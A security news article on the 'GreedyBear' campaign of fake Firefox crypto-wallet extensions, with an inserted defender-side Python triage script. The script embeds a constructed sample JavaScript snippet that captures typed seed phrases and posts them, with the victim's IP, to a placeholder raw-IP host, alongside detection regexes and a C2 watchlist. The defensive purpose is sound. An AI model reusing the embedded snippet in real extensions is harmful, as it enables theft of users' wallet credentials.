GreedyBear Unleashed: How 150 Malicious Firefox Extensions Stole $1M in Crypto Using AI-Powered Evasion
#Security


LavX Team
3 min read

A massive campaign dubbed 'GreedyBear' flooded Mozilla's add-on store with 150 fraudulent extensions, draining over $1 million from users by impersonating popular cryptocurrency wallets like MetaMask. Security researchers at Koi Security reveal how AI-generated code enabled attackers to bypass defenses and rapidly scale the operation, underscoring systemic vulnerabilities in browser extension ecosystems. This incident highlights the escalating arms race between cybercriminals leveraging automati


In a stark reminder of the fragility of browser extension security, Mozilla's Firefox add-on store was recently infiltrated by 150 malicious extensions designed to drain cryptocurrency wallets. Dubbed 'GreedyBear' by researchers at Koi Security, the campaign netted an estimated $1 million from unsuspecting victims before being dismantled. The operation’s sophistication—fueled by AI-generated code—reveals how cybercriminals are increasingly automating attacks to exploit trust in legitimate software repositories.

The Bait-and-Switch Tactics of GreedyBear

GreedyBear's success hinged on a deceptive two-phase approach. Attackers first uploaded extensions impersonating trusted wallets like MetaMask, TronLink, and Rabby in a benign form to pass Mozilla's initial review process. These versions accumulated fake positive reviews to build credibility. Once established, the publishers silently stripped out branding and injected malicious code, transforming them into crypto-draining tools.

An extension in its initial benign state, later weaponized to steal credentials. (Source: Koi Security)

The malicious code functioned as a keylogger, capturing input from form fields within the extension's popup interface. "The weaponized extensions capture wallet credentials directly from user input fields and exfiltrate them to a remote server controlled by the group," explained Tuval Admoni of Koi Security. "During initialization, they also transmit the victim’s external IP address, likely for tracking or targeting purposes." This data was sent to a command-and-control (C2) server at IP address 185.208.156.66, which coordinated the entire operation.
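The behaviour described above (a popup script that reads typed wallet credentials, looks up the victim's external IP, and posts both to a raw-IP endpoint) is a pattern a reviewer can triage statically. The following is an added defender-side example, not code from Koi Security or the article; the manifest, popup script and the 203.0.113.10 endpoint are constructed sample data, while the C2 watchlist entry is the address reported in the article.

```python
import json
import re

# Constructed sample extension (not the real GreedyBear code): a popup script that
# reads a seed phrase from a form field and posts it to a hard-coded raw-IP host.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Wallet Helper",
    "permissions": ["storage", "tabs", "<all_urls>"],
    "browser_action": {"default_popup": "popup.html"},
})
SAMPLE_POPUP_JS = r"""
fetch("https://api.ipify.org?format=json").then(r => r.json()).then(d => {
  fetch("http://203.0.113.10/init", {method: "POST", body: JSON.stringify(d)});
});
document.getElementById("seed").addEventListener("input", e => {
  fetch("http://203.0.113.10/collect", {method: "POST", body: e.target.value});
});
"""

KNOWN_C2 = {"185.208.156.66"}  # C2 address reported for GreedyBear in the article

INPUT_CAPTURE = re.compile(r"addEventListener\(\s*['\"](input|keydown|keyup|keypress|change)['\"]")
NETWORK_SEND = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b")
RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
IP_LOOKUP = re.compile(r"ipify\.org|ip-api\.com|ipinfo\.io|icanhazip\.com")

def triage(manifest_json, scripts):
    """Return heuristic findings for one extension (manifest JSON plus its script sources)."""
    manifest = json.loads(manifest_json)
    findings = {"broad_permissions": [], "input_capture": False, "network_send": False,
                "raw_ip_endpoints": set(), "known_c2": set(), "external_ip_lookup": False}
    for perm in manifest.get("permissions", []):
        if perm == "<all_urls>" or perm.startswith("*://*/"):
            findings["broad_permissions"].append(perm)
    for src in scripts:
        findings["input_capture"] |= bool(INPUT_CAPTURE.search(src))
        findings["network_send"] |= bool(NETWORK_SEND.search(src))
        findings["external_ip_lookup"] |= bool(IP_LOOKUP.search(src))
        for ip in RAW_IP_URL.findall(src):
            findings["raw_ip_endpoints"].add(ip)
            if ip in KNOWN_C2:
                findings["known_c2"].add(ip)
    # Typed-input capture combined with network sends to a raw-IP host is the
    # credential-harvest-plus-exfiltration shape the report describes.
    findings["suspicious"] = findings["input_capture"] and findings["network_send"] and (
        bool(findings["raw_ip_endpoints"]) or bool(findings["known_c2"]))
    return findings

if __name__ == "__main__":
    print(triage(SAMPLE_MANIFEST, [SAMPLE_POPUP_JS]))
```

These regexes are a first-pass filter for review queues, not a verdict; obfuscated or dynamically built URLs will not match, which is why behaviour-based checks are still needed.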

A Broader Ecosystem of Deception

GreedyBear extended beyond Firefox, with ties to Russian-speaking pirated software sites distributing 500 distinct malware variants, including info-stealers like LummaStealer and ransomware. These sites hosted fake services mimicking Trezor and Jupiter Wallet, creating a multi-pronged attack funnel.

A fraudulent Jupiter Wallet site used to lure victims into downloading malware. (Source: Koi Security)

Koi Security's report notes "clear signs of AI-generated artifacts" in the campaign's code, enabling attackers to rapidly iterate payloads and evade detection. This AI-driven scalability allowed GreedyBear to rebound quickly after takedowns—a concerning evolution from last month's attack involving 40 fake extensions on Firefox. Despite Mozilla deploying a crypto-drainer detection system in June 2025, the store's vetting process proved insufficient against such adaptable threats. Worryingly, evidence suggests the group is testing expansions to the Chrome Web Store, with a malicious 'Filecoin Wallet' extension already spotted using identical theft logic.

Why This Matters for Developers and Security Teams

The GreedyBear campaign underscores critical vulnerabilities in the software supply chain. Browser extensions, often granted high-level permissions, represent a low-risk, high-reward vector for attackers. As Koi Security emphasizes, AI lowers barriers for cybercriminals, enabling them to generate convincing fake extensions at scale and outpace traditional security reviews. For developers, this highlights the urgency of zero-trust principles—even in curated marketplaces. Mozilla acted swiftly to remove the extensions after Koi's disclosure, but the incident exposes gaps in proactive threat hunting.

To mitigate risks, always verify extensions directly via official project websites, scrutinize publisher details, and prioritize user reviews from multiple sources. As AI continues to democratize cybercrime, the industry must prioritize automated, behavior-based detection over static reviews. In this landscape, vigilance isn't just best practice—it's the last line of defense.

Source: BleepingComputer, with analysis from Koi Security.
